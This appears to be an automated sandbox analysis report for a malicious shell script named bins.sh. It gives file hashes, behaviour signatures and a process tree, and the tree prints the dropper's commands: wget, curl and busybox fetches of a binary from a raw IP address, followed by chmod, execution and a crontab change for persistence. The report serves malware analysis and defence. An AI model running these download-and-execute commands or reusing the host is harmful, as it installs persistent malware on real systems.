Overview

overview

10

Static

static

1

bins.sh

ubuntu-18.04-amd64

10

bins.sh

debian-9-armhf

7

bins.sh

debian-9-mips

10

bins.sh

debian-9-mipsel

10

Analysis

  • max time kernel
    150s
  • max time network
    153s
  • platform
    debian-9_armhf
  • resource
    debian9-armhf-20240611-en
  • resource tags

    arch:armhfimage:debian9-armhf-20240611-enkernel:4.9.0-13-armmp-lpaelocale:en-usos:debian-9-armhfsystem
  • submitted
    01/12/2024, 22:31

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    bins.sh

  • Size

    10KB

  • MD5

    7187e723d6c6ea19e696987e38c40047

  • SHA1

    2c99d3c07e904340b7d1bcec7afd801fd513c89b

  • SHA256

    6901f203d1426288bdbc5d00984e7c0b3f5858fe8fd416414acec6008b364fe9

  • SHA512

    809dbae9c9c2c1d24653f28bc97f465a8db299c250acee7370187698501afba9c55cd1935d07ed5054a10bfa753648c8f951ac7d1cc04c4818674bc67c1cef85

  • SSDEEP

    192:hWHDT6y8LZfhfRfBfMfwfvg8UzTNR9+B1te+SbtRp+eQjfhfRfBfMfwfrg8UzT/U:hFLhpZJGier+B1te+S2TpZJGiRB1te+x

Score
7/10
antivmdefense_evasiondiscoveryexecutionpersistenceprivilege_escalatio

Malware Config

Signatures

  • File and Directory Permissions Modification 1 TTPs 1 IoCs

    Adversaries may modify file or directory permissions to evade defenses.

    defense_evasion
  • Executes dropped EXE 1 IoCs
  • Renames itself 1 IoCs
  • Creates/modifies Cron job 1 TTPs 1 IoCs

    Cron allows running tasks on a schedule, and is commonly used for malware persistence.

    executionpersistenceprivilege_escalatio
  • Enumerates running processes

    Discovers information about currently running processes on the system

  • Checks CPU configuration 1 TTPs 1 IoCs

    Checks CPU information which indicate if the system is a virtual machine.

    antivm
  • Reads runtime system information 64 IoCs

    Reads data from /proc virtual filesystem.

    discovery
  • Writes file to tmp directory 3 IoCs

    Malware often drops required files in the /tmp directory.

Processes

  • /tmp/bins.sh
    /tmp/bins.sh
    1⤵
      PID:653
      • /bin/rm
        /bin/rm bins.sh
        2⤵
          PID:655
        • /usr/bin/wget
          wget http://216.126.231.240/bins/g7orhImR4xVdsrIxwDdyFRYPmbJorCG7W0
          2⤵
          • Writes file to tmp directory
          PID:664
        • /usr/bin/curl
          curl -O http://216.126.231.240/bins/g7orhImR4xVdsrIxwDdyFRYPmbJorCG7W0
          2⤵
          • Checks CPU configuration
          • Writes file to tmp directory
          PID:684
        • /bin/busybox
          /bin/busybox wget http://216.126.231.240/bins/g7orhImR4xVdsrIxwDdyFRYPmbJorCG7W0
          2⤵
          • Writes file to tmp directory
          PID:686
        • /bin/chmod
          chmod 777 g7orhImR4xVdsrIxwDdyFRYPmbJorCG7W0
          2⤵
          • File and Directory Permissions Modification
          PID:687
        • /tmp/g7orhImR4xVdsrIxwDdyFRYPmbJorCG7W0
          ./g7orhImR4xVdsrIxwDdyFRYPmbJorCG7W0
          2⤵
          • Executes dropped EXE
          • Renames itself
          • Reads runtime system information
          PID:688
          • /bin/sh
            sh -c "crontab -l"
            3⤵
              PID:690
              • /usr/bin/crontab
                crontab -l
                4⤵
                  PID:691
              • /bin/sh
                sh -c "crontab -"
                3⤵
                  PID:694
                  • /usr/bin/crontab
                    crontab -
                    4⤵
                    • Creates/modifies Cron job
                    PID:695
              • /bin/rm
                rm g7orhImR4xVdsrIxwDdyFRYPmbJorCG7W0
                2⤵
                  PID:699
                • /usr/bin/wget
                  wget http://216.126.231.240/bins/je2N9IXFhuTiWlmM0jstIexofrtcLrmPjQ
                  2⤵
                    PID:702

                Network

                MITRE ATT&CK Enterprise v15

                Replay Monitor

                Loading Replay Monitor...

                Downloads

                • /tmp/g7orhImR4xVdsrIxwDdyFRYPmbJorCG7W0
                  Filesize

                  177KB

                  MD5

                  786d75a158fe731feca3880f436082c0

                  SHA1

                  79ea2734e43d00cdeabed5586b2c1994d02aef3e

                  SHA256

                  5fb5b9beb44997a6d1baf950a8bf05b94aa59406d82ba2fea27eb13c497d4b18

                  SHA512

                  7984ebc874563267570f828ee158e4860971e184900e3590ac3b4829285443e065dd1ad4df190ceabf575880a4cd8ead4dd1132e9c1650239accf3f6440a3f7f

                  Download Submit

                • /var/spool/cron/crontabs/tmp.TxgGaB
                  Filesize

                  210B

                  MD5

                  36ef50a4c7c5111de6cb32084d008ed1

                  SHA1

                  f4b2afdde330bbc809d52c2d28525fa0b8f30a24

                  SHA256

                  7589c71ad368ff14c6a059bcfe2db02f2917d78835525cc4e1b39cfcd84837a3

                  SHA512

                  36a7b56b7f9beb07db1d4e60dd3259c64675ee53f9acdeba502d62fad3febbc7c6f54f06f38772ed3340c99d67c020a5a5caa6aa63f6b48de1515bd8a2d80ba0

                  Download Submit